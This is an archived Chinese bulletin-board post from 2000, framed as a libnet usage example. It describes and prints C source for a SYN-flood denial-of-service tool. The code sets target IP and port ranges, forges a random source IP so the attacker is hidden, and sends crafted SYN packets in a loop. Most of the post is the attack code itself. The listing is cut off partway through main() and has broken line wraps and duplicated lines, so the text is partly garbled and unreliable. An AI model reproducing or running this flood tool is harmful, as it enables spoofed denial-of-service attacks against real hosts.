📄 528.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="519.htm">上一层</a>][<a href="529.htm">下一篇</a>]
<hr><p align="left"><small>发信人: scz (小四), 信区: Security <br>
标 题: libnet使用举例(3) <br>
发信站: 武汉白云黄鹤站 (Thu Jul 27 15:45:11 2000), 站内信件 <br>
日期:2000-07-27 11:05 <br>
syn-flood的原理不再重复。需要通过命令行传递目标IP,应该允许指定单个IP或者 <br>
指定一个IP范围,这个可以统一成指定IP范围。还需要通过命令行传递目标端口,同 <br>
上,允许指定端口范围,指定单个PORT的时候就是把范围局限在一个端口上。无论什 <br>
么理由,都不应该直接使用本机(发起攻击的主机)IP作为源IP,所以需要通过命令行 <br>
指定一个伪造的源IP,在命令行上并未提供源IP的情况下,使用伪随机数发生器产生 <br>
伪随机源IP。对源端口的处理类似源IP。所谓flood,自然要考虑发送SYN报文的次数, <br>
<br>
也通过命令行参数指定。 <br>
下面举例是在i386/Linux平台上进行的,使用了getopt()函数长选项支持,如果转到 <br>
SPARC/Solaris平台上,一般是不支持长选项的,此次故意没有提供这个兼容性考虑, <br>
N年不用长选项,手痒痒,将就一下啦,如果要移植,换掉命令行参数处理部分即可。 <br>
-------------------------------------------------------------------------- <br>
/* <br>
* File : syn flood program for i386/Linux using libnet <br>
* Version: 0.99 alpha <br>
* Complie: gcc -O3 -o sf syn-flood.c `libnet-config --defines --cflags` `li <br>
bnet <br>
-config --libs` <br>
* Usage : ./sf --dil 192.168.10.2 --dih 192.168.10.2 --dpl 23 --dph 23 <br>
* Date : 2000-07-27 10:52 <br>
*/ <br>
/******************************************************************* <br>
* * <br>
* 头文件 * <br>
* * <br>
*******************************************************************/ <br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <time.h> /* 使用time()产生随机化种子 */ <br>
#include <getopt.h> /* 使用getopt()长选项支持 */ <br>
#include <libnet.h> /* 使用libnet必须包含这个头文件 */ <br>
/******************************************************************* <br>
* * <br>
* 宏定义 * <br>
* * <br>
*******************************************************************/ <br>
#define _GNU_SOURCE <br>
#define SUCCESS 0 <br>
#define FAILURE -1 <br>
#define DEFAULTSYNNUMBER 74 /* 缺省发送SYN报文数目 */ <br>
struct ipoctet <br>
struct ipoctet <br>
{ <br>
char a[4]; <br>
char b[4]; <br>
char c[4]; <br>
char d[4]; <br>
}; <br>
struct ipocteti <br>
{ <br>
int a; <br>
int b; <br>
int c; <br>
int d; <br>
}; <br>
/******************************************************************* <br>
* * <br>
* 全局变量 * <br>
* * <br>
*******************************************************************/ <br>
/* 用于初始化伪随机数发生器 */ <br>
u_long randomState[64] = <br>
{ <br>
0x00000003, 0x32d9c024, 0x9b663182, 0x5da1f342, 0x7449e56b, 0xbeb1dbb0, 0xab <br>
5c59 <br>
18, 0x946554fd, <br>
0x8c2e680f, 0xeb3d799f, 0xb11ee0b7, 0x2d436b86, 0xda672e2a, 0x1588ca88, 0xe3 <br>
6973 <br>
5d, 0x904f35f7, <br>
0xd7158fd6, 0x6fa6f051, 0x616e6b96, 0xac94efdc, 0xde3b81e0, 0xdf0a6fb5, 0xf1 <br>
03bc <br>
02, 0x48f340fb, <br>
0x36413f93, 0xc622c298, 0xf5a42ab8, 0x8a88d77b, 0xf5ad9d0e, 0x8999220b, 0x27 <br>
fb47 <br>
b9, 0x9a319039, <br>
0x94102000, 0x9610000a, 0xc60a0000, 0x90022001, 0x8408e07f, 0x8528800a, 0x80 <br>
88e0 <br>
80, 0x02800004, <br>
0x9612c002, 0x10bffff9, 0x9402a007, 0x81c3e008, 0xd6224000, 0x86102000, 0x94 <br>
1000 <br>
03, 0xd60a0000, <br>
0x90022001, 0x840ae07f, 0x85288003, 0x94128002, 0x808ae080, 0x12bffffa, 0x86 <br>
00e0 <br>
07, 0x80a0e01f, <br>
0x18800006, 0x808ae040, 0x02800004, 0x84103fff, 0x85288003, 0x94128002, 0x81 <br>
c3e0 <br>
c3e0 <br>
08, 0xd4224000 <br>
}; <br>
u_char * packet = NULL; <br>
/* syn-flood不需要负载 */ <br>
size_t packet_size = LIBNET_IP_H + LIBNET_TCP_H; <br>
int rawSocket; <br>
/******************************************************************* <br>
* * <br>
* 函数原型 * <br>
* * <br>
*******************************************************************/ <br>
void Libnet_do_checksum ( u_char * buf, int protocol, int len ); <br>
void Libnet_init_packet ( size_t p_size, u_char ** buf ); <br>
int Libnet_open_raw_sock ( int protocol ); <br>
void Libnet_write_ip ( int sock, u_char * packet, int len ); <br>
void synFlood ( u_long srcIp, u_short srcPort, u_long dstIp, u_short dstPort <br>
, u_ <br>
long synNumber ); <br>
void usage ( char * arg ); <br>
/*----------------------------------------------------------------------*/ <br>
void Libnet_do_checksum ( u_char * buf, int protocol, int len ) <br>
{ <br>
{ <br>
if ( libnet_do_checksum( buf, protocol, len ) == -1 ) <br>
{ <br>
libnet_error( LIBNET_ERR_FATAL, "libnet_do_checksum failed\n" ); <br>
} <br>
return; <br>
} /* end of Libnet_do_checksum */ <br>
void Libnet_init_packet ( size_t p_size, u_char ** buf ) <br>
{ <br>
if ( libnet_init_packet( p_size, buf ) == -1 ) <br>
{ <br>
libnet_error( LIBNET_ERR_FATAL, "Can't initialize packet\n" ); <br>
} <br>
return; <br>
} /* end of Libnet_init_packet */ <br>
int Libnet_open_raw_sock ( int protocol ) <br>
{ <br>
int s; <br>
if ( ( s = libnet_open_raw_sock( protocol ) ) == -1 ) <br>
{ <br>
libnet_error( LIBNET_ERR_FATAL, "Can't open raw socket %08x\n", prot <br>
ocol <br>
); <br>
); <br>
} <br>
return( s ); <br>
} /* end of Libnet_open_raw_sock */ <br>
void Libnet_write_ip ( int sock, u_char * packet, int len ) <br>
{ <br>
int w; <br>
if ( ( w = libnet_write_ip( sock, packet, len ) ) < len ) <br>
{ <br>
libnet_error( LIBNET_ERR_WARNING, "libnet_write_ip only wrote %d byt <br>
es\n <br>
", w ); <br>
} <br>
return; <br>
} /* end of Libnet_write_ip */ <br>
void synFlood ( u_long srcIp, u_short srcPort, u_long dstIp, u_short dstPort <br>
, u_ <br>
long synNumber ) <br>
{ <br>
u_long s; <br>
/* 构造IP头 */ <br>
libnet_build_ip( LIBNET_TCP_H, /* IP数据区长度 */ <br>
IPTOS_LOWDELAY, /* IP tos */ <br>
( u_short )random(), /* IP ID */ <br>
0, /* frag stuff */ <br>
255, /* TTL */ <br>
IPPROTO_TCP, /* 上层协议 */ <br>
srcIp, /* big-endian序 */ <br>
dstIp, /* 目标IP */ <br>
NULL, /* 无选项 */ <br>
0, /* 选项长度零 */ <br>
packet ); /* 指向IP头 */ <br>
for ( s = 0; s < synNumber; s++ ) <br>
{ <br>
// 为了保证syn-flood成功,必须不断变更相关五元组,这里 <br>
// 通过不断变更源端口达到目的。源IP之所以不类似处理,因为考虑在有 <br>
// 源IP限制的情况下进行syn-flood。 <br>
/* 构造TCP头 */ <br>
libnet_build_tcp( ( u_short )( srcPort + s ), /* 源端口 */ <br>
dstPort, /* 目标端口 */ <br>
0x51211314, /* seq num */ <br>
0, /* ack num */ <br>
TH_SYN, /* control flags */ <br>
1024, /* window size */ <br>
0, /* urgent pointer */ <br>
NULL, /* payload (none) */ <br>
0, /* payload length */ <br>
packet + LIBNET_IP_H ); /* 指向TCP头 */ <br>
/* 计算TCP校验和,IP校验和由内核亲自计算 */ <br>
Libnet_do_checksum( packet, IPPROTO_TCP, LIBNET_TCP_H ); <br>
/* 发送SYN报文 */ <br>
Libnet_write_ip( rawSocket, packet, packet_size ); <br>
// 这个输出很耗费时间,如果不是调试用,应该去掉 <br>
// fprintf( stderr, "." ); <br>
} /* end of for */ <br>
return; <br>
} /* end of synFlood */ <br>
void usage ( char * arg ) <br>
{ <br>
fprintf( stderr, " Usage: %s [--si srcIp] [--dil dstIpLow] [--dih dstIpH <br>
igh] <br>
\n\t" <br>
"[--sp srcPort] [--dpl dstPortLow] [--dph dstPortHigh]\ <br>
n\t" <br>
"[--num synNumber]\n", arg ); <br>
exit( FAILURE ); <br>
} /* end of usage */ <br>
int main ( int argc, char * argv[] ) <br>
{ <br>
#define LONGOPTIONCHAR '-' <br>
/* 定义长选项 */ <br>
static struct option longOption[] = <br>
{ <br>
{ "si", 1, 0, LONGOPTIONCHAR }, /* 源IP */ <br>
{ "dil", 1, 0, LONGOPTIONCHAR }, /* 目标IP低端 */ <br>
{ "dih", 1, 0, LONGOPTIONCHAR }, /* 目标IP高端 */ <br>
{ "sp", 1, 0, LONGOPTIONCHAR }, /* 源端口 */ <br>
{ "dpl", 1, 0, LONGOPTIONCHAR }, /* 目标端口低端 */ <br>
{ "dph", 1, 0, LONGOPTIONCHAR }, /* 目标端口高端 */ <br>
{ "num", 1, 0, LONGOPTIONCHAR }, /* SYN报文数目 */ <br>
{ 0, 0, 0, 0 } <br>
}; <br>
int longOptionIndex = 0; /* 用于处理长选项 */ <br>
int i, j, a, b, c, d; <br>
struct ipoctet ipstart, ipend; <br>
struct ipocteti ipstarti, ipendi; <br>
struct ipoctet * pipstart = &ipstart; <br>
struct ipoctet * pipend = &ipend; <br>
/* 源IP使用使用网络字节序指定 */ <br>
u_long srcIp = 0xffffffff; <br>
u_long dstIp; <br>
u_short srcPort = 0xffff; <br>
u_short dstPort; <br>
u_short dstPortLow = 1; /* 缺省端口范围1- <br>
1024 <br>
*/ <br>
u_short dstPortHigh = 1024; <br>
u_long synNumber = DEFAULTSYNNUMBER; /* SYN报文数目 <br>
*/ <br>
unsigned int randomSeed = ( unsigned int )time( NULL ); <br>
if ( argc == 1 ) <br>
{ <br>
usage( argv[0] ); <br>
} <br>
initstate( randomSeed, ( char * )randomState, 128 ); <br>
setstate( ( char * )randomState ); <br>
opterr = 0; /* don't want getopt() writing to stderr */ <br>
while ( ( c = getopt_long( argc, argv, "h", longOption, &longOptionIndex <br>
) <br>
) != EOF ) <br>
{ <br>
{ <br>
switch ( c ) <br>
{ <br>
case LONGOPTIONCHAR: /* 处理长选项 */ <br>
/* <br>
fprintf( stderr, "option %s", longOption[ longOptionIndex ].name <br>
); <br>
if ( optarg ) <br>
{ <br>
fprintf( stderr, " with arg %s", optarg ); <br>
} <br>
fprintf( stderr, "\n" ); <br>
*/ <br>
if ( optarg ) <br>
{ <br>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -